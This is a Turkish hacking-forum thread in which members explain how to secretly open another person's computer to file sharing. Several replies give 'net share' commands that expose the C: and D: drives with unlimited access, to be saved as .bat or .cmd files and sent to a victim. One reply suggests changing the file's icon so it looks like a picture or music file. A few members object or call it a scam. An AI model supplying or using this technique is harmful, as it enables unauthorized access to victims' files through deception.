KARSI PC YI paylasıma acmak PLS

bulls

Katılımcı Üye
10 Ara 2006
341
7
S.A arkadaslar hanı msn den pc ye girme varya Essential NetTools bu programla pc paylasıma acıksa giriyor ya PAYLASIMA acmak için nasıl bır yontemınız var msj beklıyorum :diablo :diablo

-------------------------BULLS--------------------:diablo

hackerless

Yeni üye
4 Kas 2006
2
0
arkadaşım çok basit bu olay
aşagıda uzantısı bat olan bir dosya koydum mantıgı dos komutu ile tıklayınca pc yi (c: sürücüsünü) paylaşıma açıyor
istersen not defterinde düzenle c: yazan yere d: yaz d yi paylaşıma açsın tek yapman gereken karşıya gönderip tıklamasını saglamak
rar şifresini unutma şifre aşagıda sitemin ismi
rar şifresi: www.limitless.tr.cx
download: http://www.uploadsitesi.com/u/download.php?file=401195

BY_EFSANE_42

Yeni üye
7 Ocak 2008
2
0
ya arkadaşlar güzel yorumlar warda bir kerede millete iyi bişeyler paylaşıma sunun yaa millet de sizi bişey sansın saçma sapan proğramlar yapmayın genelleleme olara söylüyorum çoğu işe yaramıyor buda öyle kandırmayın milleti ne olurr..

halsond

Yeni üye
29 Ağu 2008
1
0
selam
bu konuyla ilgili bahsetmiş olduğunuz adrese girdim ama indiremedim kodu buraya yazmanızda bir sakınca var mı?

sard.555

Katılımcı Üye
1 Ağu 2008
341
1
işte tam burası THT
S.A arkadaslar hanı msn den pc ye girme varya Essential NetTools bu programla pc paylasıma acıksa giriyor ya PAYLASIMA acmak için nasıl bır yontemınız var msj beklıyorum :diablo :diablo

-------------------------BULLS--------------------:diablo

Karsi tarafin bilgisayarini paylasima acik hale getirmek
net share hacker=c:\ /unlimited /remark:"RockStar"
bu komutu notepad a yazin . sonra da dosyayi .cmd biçiminde kaydedin . karsi taraf açtiktan sonra c sürücüsü paylasima açik olacaktir . sonra karsi tarafin ip ni essential net tools yada Bui Bios gibi programlara yazarak erisimi saglarsiniz .
Not bu komut sadece c sürücüsünü paylasima açik hale getirir . eger baska sürücüleri varsa c yerine d ,e artik ne kadarsa yazarak ekleyebilirsiniz.

arkadaşım bunu en güzel yedirme tekniği ise icon değiştirici ile iconunu değiştirip karşı tarafa resim veya müzik dosyası şeklinde yedirmektir eğer icon değiştirici bulmakta zorlanırsan ki pek zannetmem ben sana linkini yollarım şimdi vermim forumda olabilir çünkü doğru olmaz hadi kolay gelsin...
+repini beklerim :D

Virtual Root

Kıdemli Üye
8 Haz 2008
3,488
5
gene iş başa düştü aranızda en uzun süre forumda bulunmuş olan vede rütbe ve mesaj bakımdanda tyüksek olarak bu konuyu ilg,li yerlere iletin vede bu rda moderötör diye birşey bilmem anladınızmı

2 Eyl 2008
98
0
sard.555 kardeşimin verdii kod eksik bu tam bakın...

net share hacker=c:\ /unlimited /remark:"RockStar"
net share hacker=d:\ /unlimited /remark:"RockStar"
KARDEŞİM BUNUN UZANTISINI .BAT YAPCAN KARSI YA YOLLUCAN ODA AÇÇAK OKADAR

keon0650

Yeni üye
24 Şub 2008
15
0
Ankara
Kodları veren arkadaşlar utanmıyormusunuz sizden bişeyler öğrenmeye çalışan arkadaşların bilgisayarlarına sızmaya!
YA ARKADAŞLAR BU KODLARA İNANMAYIN!!KODLARI NOT DEFTERİNE YAZIYORSUNUZ VE TXT YAZISINI BAT A ÇEVİRDİĞİNİZ AN SİZİN BİLGİSAYARINIZ PAYLAŞIMA AÇILIYOR İNANMAYIN BÖYLE ŞEYLERE!!!

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.